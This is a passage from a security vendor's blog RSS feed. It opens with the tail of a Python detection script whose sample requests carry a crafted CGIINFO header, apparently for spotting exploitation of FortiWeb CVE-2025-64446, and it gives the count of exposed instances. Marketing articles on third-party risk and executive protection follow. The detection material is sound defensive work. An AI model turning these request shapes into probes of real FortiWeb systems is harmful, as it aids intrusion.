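    {"method": "POST", "uri": "/login",
     "headers": {"CGIINFO": "not-base64!"}},  # header present but not Base64
]

if __name__ == "__main__":
    for idx, verdict in scan_requests(SAMPLE_REQUESTS):
        print(f"request {idx}: {verdict}")
```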
        <p><strong>Exposure:</strong> ~4,768 FortiWeb instances visible on Shodan (Netherlands, US, Germany, Italy, Peru)</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13b330b3e13aad900440407bcd3dde599640b59e9.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="797" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2025-64446 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1afc13c5574e9a8966347fe80012616de5d023fd2.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[5 Real-World Third-Party Risk Examples]]></title>
            <link>https://www.recordedfuture.com/ko/blog/third-party-risk-examples</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/third-party-risk-examples</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore 5 third-party risk examples, from vendor data breaches to supply chain attacks and learn how third-party risk management can prevent cyberattacks.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Static vendor checks fall short:</strong> Traditional, point-in-time third-party risk management practices (e.g. annual questionnaires) leave organizations blind to emerging vendor threats between audits. Continuous monitoring is now a must.</li>
          <li><strong>Five common risk scenarios:</strong> Supply chain attacks, widespread software vulnerabilities, hidden fourth-party dependencies, vendor credential theft, and vendor instability each illustrate how “trusting” vendors can lead to breaches or business disruptions.</li>
          <li><strong>Intelligence-driven defense:</strong> Recorded Future’s platform provides real-time visibility into your vendor ecosystem—from dark web credential leaks to fourth-party relationships—enabling proactive mitigation before incidents impact your organization.</li>
          <li><strong>From trust to verification:</strong> The solution is to move from static trust to continuous verification. By continuously assessing vendors’ cyber and business health (and even integrating intelligence into workflows like ServiceNow), security leaders can vastly strengthen their vendor risk management framework.</li>
        </ul>
        <h2>Your Vendor Ecosystem Is a Black Box: It’s Time to Turn on the Lights</h2>
        <p>For CISOs and risk leaders, the attack surface now goes far beyond the footprint of the business. It’s a sprawling web of SaaS vendors, software suppliers, MSPs, payment processors, logistics partners, and niche fourth parties your vendors rely on. Every connection expands risk—often outside direct visibility. In other words, your security may only be as strong as your weakest vendor or partner.</p>
        <p>Traditional third-party risk management (TPRM)—static security questionnaires and annual audits—cannot keep pace. They describe what a vendor claimed their security looked like months ago, not what it is right now. Meanwhile, the most damaging events (supply chain attacks, zero-day exploitation, credential resale, concentration failures) unfold in hours and days, not quarters.</p>
        <p>This gap between point-in-time paperwork and real-time risk is why third-party exposure has become a primary vector for catastrophic breaches and business outages.</p>
        <p>This article will highlight and analyze 5 real-world third-party risk examples. For each, we'll show why traditional methods fail and how continuous, real-time <a href="https://www.recordedfuture.com/ko/threat-intelligence-101/risk-assessment-management/third-party-risk-management">third-party risk management</a> and threat intelligence are the only effective prevention.</p>
        <h2>5 Third-Party Risk Examples and How to Prevent Them</h2>
        <p>Modern vendor risk comes in many forms. Let’s explore five common scenarios—and how proactive measures can stop them:</p>
        <h3>Type 1: The Software Supply Chain Attack</h3>
        <p><strong>The Scenario:</strong> One of the most damaging third-party risks is a software supply chain attack. This occurs when threat actors breach a trusted software vendor’s development environment and secretly inject malicious code into a legitimate, digitally signed software update. The tainted update, a “Trojan horse,” is then distributed to the vendor’s customers, giving the attacker access into thousands of networks at once.</p>
        <p><strong>Real-World Example:</strong> <a href="https://www.gao.gov/blog/solarwinds-cyberattack-demands-significant-federal-and-private-sector-response-infographic">The SolarWinds Orion breach</a> is a quintessential case. In 2020, nation-state hackers compromised SolarWinds’ build pipeline and inserted malware into an Orion software update. The malicious update, being validly signed, was pushed to around 18,000 customers, including numerous government agencies and Fortune 500 companies, which installed it as a routine update, granting the attackers insider access to their systems.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A standard vendor security questionnaire or audit would never have caught this. SolarWinds had passed assessments and appeared reputable. The update itself was digitally signed and appeared “trusted” to antivirus scanners and other controls. In short, you cannot audit your way out of a risk that’s been inserted into a trusted product’s software supply chain.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Preventing a supply chain attack means detecting subtle warning signs before the breach fully unfolds. Recorded Future’s platform continuously monitors for early indicators tied to your vendors. If threat actors known for targeting CI/CD pipelines start discussing or probing one of your software vendors, you’d know. If intelligence suggests a vendor’s code-signing certificate may be compromised, you’d get an alert. Armed with this foresight, you could elevate that vendor’s risk status, scrutinize their software updates more closely, and even hunt for indicators of compromise in your environment before the breach becomes public knowledge.</p>
        <h3>Type 2: The Widespread Third-Party Vulnerability</h3>
        <p><strong>The Scenario:</strong> A critical software vulnerability (often a zero-day) is discovered in a common component that many of your vendors use. It could be an open-source library, a popular IT tool, or a cloud service. You have no direct visibility that your suppliers rely on this component. Attackers quickly develop an exploit and start compromising organizations at scale via this flaw, long before most victims even realize they’re exposed through their third parties.</p>
        <p><strong>Real-World Example:</strong> The <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a">MOVEit Transfer zero-day</a> (exploited by the Cl0p ransomware group) and the <a href="https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance">Log4j “Log4Shell” vulnerability</a> are perfect examples of this risk. In the case of MOVEit, a single bug in a widely used file-transfer product led to the mass theft of data from thousands of companies, many of whom weren’t even direct customers of MOVEit, but their vendors were. Similarly, the Log4j flaw impacted countless businesses indirectly because software used by their contractors and providers included the vulnerable library.</p>
        <p><strong>Why Traditional Methods Fail:</strong> This is fundamentally a technology visibility problem. A point-in-time survey asking your vendors “Do you use MOVEit?” is too little, too late. By the time you send out a questionnaire and get a reply (if you get one at all), attackers may have already exploited the vulnerability and exfiltrated data. No organization can manually track every piece of software in their extended vendor ecosystem through periodic check-ins. In the MOVEit incident, many companies had no idea they were at risk until news of data breaches surfaced. Traditional vendor risk management simply isn’t designed to monitor technical exposure in real time.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Defending against widespread vulnerabilities requires connecting two dots instantly: <a href="https://www.recordedfuture.com/ko/threat-intelligence-101/risk-assessment-management/third-party-risk-assessment">what’s vulnerable and who in your supply chain is using it</a>. This is where an intelligence platform shines. Recorded Future’s approach combines technical attack surface intelligence with real-time vulnerability tracking. It continuously scans the internet to map out the external-facing tech stack of your third parties. The moment a new critical vulnerability is disclosed, <a href="https://www.recordedfuture.com/ko/products/third-party-intelligence">Recorded Future’s intelligence</a> automatically checks which of your vendors are running that technology. You receive an immediate, prioritized alert such as: “CRITICAL: 15 of your third-party vendors are exposing servers running [the vulnerable software]. Prompt them to apply patches or mitigations immediately.”</p>
        <h3>Type 3: The Fourth-Party &amp; Concentration Risk</h3>
        <p><strong>The Scenario:</strong> Sometimes the biggest risk in your vendor ecosystem isn’t with your direct third parties, but with their key dependencies. A “fourth party” is a vendor of your vendor, and if one that many of your critical vendors rely on goes down, it can create a single point of failure. A single outage can cascade up the chain, disrupting operations even when direct vendors appear secure.</p>
        <p><strong>Real-World Example:</strong> The <a href="https://www.cisa.gov/news-events/news/kaseya-ransomware-attack-guidance-affected-msps-and-their-customers">2021 ransomware attack on Kaseya’s VSA remote monitoring and management platform</a> is a textbook case. Kaseya primarily served managed service providers (MSPs), who in turn delivered IT services to thousands of downstream customers. When attackers exploited Kaseya VSA, they were effectively able to push ransomware out through those MSPs to many organizations that had no direct relationship with Kaseya at all—they only “knew” their MSP. A single fourth-party dependency became the pivot point for a broad, multi-industry disruption.</p>
        <p><strong>Why Traditional Methods Fail:</strong> If you looked at each of your primary (third-party) vendors in isolation, they all might have passed your security reviews with flying colors. What the traditional assessment missed was that ten of those vendors all relied on the same subcontractor for a critical function: a serious audit blind spot. Most organizations only discovered their exposure to Kaseya after MSP-delivered systems were already encrypted. Without continuous visibility into your vendors’ vendors, this kind of concentration risk remains invisible until it’s too late.</p>
        <p><strong>The Intelligence-Led Solution:</strong> The only way to manage fourth-party and concentration risk is through continuous mapping of your vendors’ vendors, coupled with dynamic risk scoring. Recorded Future’s Third-Party Intelligence solution automatically identifies and maps these Nth-party relationships throughout your supply chain. In practice, this means that if a critical fourth party suffers a breach, you won’t be finding out via the news days later. Instead, your intelligence dashboard would immediately show that entity’s risk score spiking from, say, a modest 50 to a critical 99. This timely insight gives you a head start to activate business continuity and incident response plans. You immediately know exactly which of your vendors are impacted and can work to contain the fallout.</p>
        <h3>Type 4: The Vendor Credential Compromise</h3>
        <p><strong>The Scenario:</strong> Not all third-party attacks involve sophisticated malware or supply chain tampering. Sometimes hackers just log in through the front door. In this scenario, a threat actor steals valid credentials from one of your vendors and uses those to access your systems. Perhaps an employee at a smaller, “low-risk” vendor, like an HVAC contractor, falls victim to a phishing email or unknowingly runs info-stealer malware on their laptop. Their VPN login or application credentials to your network get quietly harvested and sold on the dark web. An attacker buys the login, bypasses your multi-factor authentication, and walks into your network posing as a legitimate third-party user.</p>
        <p><strong>Real-World Example:</strong> This tactic was at the heart of the high-profile <a href="https://www.bbrown.com/us/insight/a-look-back-at-the-mgm-and-caesars-incident/">2023 breaches of MGM Resorts and Caesars Entertainment</a>, where attackers initially gained access via a third-party IT support vendor’s compromised VPN credentials.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A vendor security questionnaire cannot prevent an individual at a partner company from clicking a phishing link or using a weak password. Your vendor might have all the right policies on paper, but those policies are irrelevant the moment an attacker has a valid username and password in hand. Traditional TPRM programs are about vetting a vendor’s security controls and compliance, but they don’t provide real-time awareness of things like a password leak or dark web sale of access related to that vendor.</p>
        <p><strong>The Intelligence-Led Solution:</strong> The key to stopping a credential-based breach is catching those compromised credentials before they are used against you. This calls for continuous identity-centric intelligence. Recorded Future’s Third-Party Intelligence module includes automated monitoring of a wide range of sources, from dark web forums to infostealer logs and criminal marketplaces, specifically watching for any mention of your organization’s partners and their accounts. The moment a set of credentials associated with one of your vendors appears in an illicit context, you receive a high-priority alert. Your team can immediately revoke or reset that vendor account and investigate the extent of access. This is the definition of proactive defense: you’re effectively shutting the door on the attacker before they can walk through it.</p>
        <h3>Type 5: The Operational &amp; Financial Instability Risk</h3>
        <p><strong>The Scenario:</strong> Sometimes the greatest third-party risk is a vendor’s operational or financial collapse. Consider a scenario where a critical vendor suddenly encounters a non-cyber crisis like bankruptcy, a major lawsuit or regulatory sanction, a natural disaster, or even a geopolitical event that halts their business. From your security team’s perspective everything looked fine, but virtually overnight this partner’s failure threatens to grind your business to a halt.</p>
        <p><strong>Real-World Example:</strong> A headline-grabbing case occurred with the <a href="https://www.law.uw.edu/news-events/news/2023/svb-collapse">sudden collapse of Silicon Valley Bank (SVB)</a> in March 2023. SVB wasn’t attacked by hackers; it suffered a bank run and shut down in a matter of days. Companies that used SVB as a banking partner or for credit found themselves unable to access funds or process payroll, creating a cascade of operational and financial issues.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A standard security questionnaire or compliance-focused vendor review is utterly blind to this category of risk. Your CISO’s third-party risk process likely doesn’t include reviewing a vendor’s financial statements or monitoring news about their executives’ legal troubles—nor should it, in a traditional model, since those are outside the classic IT security scope. As a result, organizations were caught off-guard by SVB’s collapse. A vendor that looked perfectly green from a security control standpoint turned out to be a huge business continuity threat. This kind of event exposes an “edge case” risk that isn’t an edge case at all: vendors can introduce strategic and financial risks that security teams and vendor managers often aren’t tracking.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Truly comprehensive third-party risk management means monitoring all-source intelligence on your vendors, not just cyber indicators. Recorded Future’s Third-Party Intelligence platform is built to ingest and analyze a broad spectrum of data about companies. This includes real-time monitoring of global news media, credit ratings and financial filings, changes in executive leadership, legal filings, sanctions lists, regulatory watchlists, and more. By defining “risk” holistically, the platform can alert you to significant non-cyber events that may impact your vendors. These signals give your security, risk, and procurement teams time to react, whether that means activating contingency plans, finding alternate suppliers, or engaging leadership to address the issue.</p>
        <h2>The Solution: Move from “Trust” to “Continuous Verification”</h2>
        <p>The five examples share a theme: “trust” is not a control. Vendor attestations and annual audits don’t capture rapidly changing third-party conditions—exploits, credentials, dependencies, and financial shocks. To answer why third-party risk management is important: it’s no longer a “vendor” problem. It’s your attack surface, your data, and your reputation on the line.</p>
        <p>This is why security leaders are shifting from a trust-but-verify model to a <a href="https://www.recordedfuture.com/ko/threat-intelligence-101/risk-assessment-management/vendor-risk-management-framework">model of continuous verification</a>, replacing blind trust with live intelligence.</p>
        <p>Moving to continuous verification means supplementing or replacing periodic vendor check-ins with real-time intelligence and automation. This is where Recorded Future’s approach comes in. Recorded Future acts as a “risk radar” that’s always on, giving you a 360-degree, real-time view of your third-party ecosystem. It uniquely integrates multiple intelligence streams—threat intelligence, attack surface intelligence, and third-party risk intelligence—into one platform.</p>
        <ul>
          <li>Know which CVEs matter today across your ecosystem with <a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a> and exploit-in-the-wild context.</li>
          <li>Detect compromised vendor access with <a href="https://www.recordedfuture.com/ko/products/identity-intelligence">Identity Intelligence</a> and automated revocation workflows.</li>
          <li>Map fourth-party dependencies and track concentration with <a href="https://www.recordedfuture.com/ko/products/third-party-intelligence">Third-Party Intelligence</a> risk scoring.</li>
          <li>Operationalize all of this via integrations to SIEM/SOAR/EDR and GRC/TPRM workflows (<a href="https://www.recordedfuture.com/ko/blog/servicenow-third-party-risk">e.g., ServiceNow</a>) so that risk evidence triggers action.</li>
        </ul>
        <p>Recorded Future is the only platform connecting disparate, live third-party intelligence into a single, real-time view that answers the question:</p>
        <p><em><strong>“Which of my vendors poses the greatest risk to my business—right now?”</strong></em></p>
        <p>Ready to replace point-in-time vendor questionnaires with continuous verification? Schedule a <a href="https://www.recordedfuture.com/ko/get-started#book-demo">personalized demo</a>, and our experts will show you how the Recorded Future platform provides a complete, real-time picture of your vendor ecosystem.</p>
        <div>
          <div>
            <div>
              <h2>FAQ</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the first step in creating a third-party risk management (TPRM) program?</h3>
              <p>The first step is inventory and categorization. You can't protect what you don't know you have. This involves creating a comprehensive inventory of all your third-party vendors, suppliers, and partners and then categorizing them based on their access to sensitive data and their criticality to your operations (e.g., "high," "medium," "low" risk).</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the difference between third-party and fourth-party risk?</h3>
              <p>Third-party risk is the risk posed by your direct vendors (e.g., your SaaS provider, your payroll company). Fourth-party risk (or Nth-party risk) is the risk posed by your vendors' vendors. For example, if your SaaS provider hosts its application on a major cloud platform, that cloud platform is your fourth party. The risk cascades up the supply chain and is often invisible to you without the right intelligence.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How often should we assess our third-party vendors?</h3>
              <p>High-risk vendors (those with access to critical data or vital to operations) should be assessed at least annually and continuously monitored in real-time. Traditional, "point-in-time" assessments (like questionnaires) are no longer sufficient, as a vendor's security posture can change overnight.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future help manage third-party risk more effectively?</h3>
              <p>Recorded Future's Third-Party Intelligence solution moves organizations beyond static, periodic assessments. It provides continuous, real-time intelligence by monitoring all your vendors for critical risk signals—like data breaches, malware infections, exposed credentials, attack surface vulnerabilities, and negative financial news—allowing you to prioritize and act on the most critical vendor risks before they become a breach.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How can I see risks from my vendors that are part of my own attack surface?</h3>
              <p>This is a critical connection. Recorded Future's Attack Surface Intelligence can be combined with Third-Party Intelligence to identify external-facing assets and vulnerabilities (e.g., services, open ports, vulnerable software) that belong to your third parties but are directly linked to your organization. This helps you understand exactly how a vendor's poor security hygiene directly exposes your own attack surface to an attacker.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1f932dac2f38bc9bc9592fb26c835aa00e1fe1df1.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[When the Digital World Turns Physical: The Expanding Role of Threat Intelligence in Executive Protection]]></title>
            <link>https://www.recordedfuture.com/ko/blog/digital-world-turns-physical-expanding-role-threat-intelligence-executive-protection</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/digital-world-turns-physical-expanding-role-threat-intelligence-executive-protection</guid>
            <pubDate>Mon, 08 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how converged threat intelligence protects executives from deepfakes, doxxing, and cyber-enabled physical threats with Recorded Future.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Takeaways</h2>
              <ul>
                <li><strong>Cyber and physical risks are converging.</strong> Online exposure now translates into real-world danger as doxxing, deepfakes, and business email compromise blur the boundary between the virtual and physical worlds.</li>
                <li><strong>Executives are prime targets.</strong> Their digital footprints, public visibility, and access to sensitive assets make them especially attractive to adversaries.</li>
                <li><strong>Threat intelligence can bridge the gap.</strong> Organizations are using social media monitoring, geopolitical analysis, and risk scoring to identify early indicators of harm against executives and employees.</li>
                <li><strong>Recorded Future enables proactive protection.</strong> By unifying physical and digital intelligence, security teams can detect threats earlier, contextualize risk, and safeguard leadership.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_12954aecdae677b3bfd16a2b689442a79b95f4b83.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
    </channel>
</rss>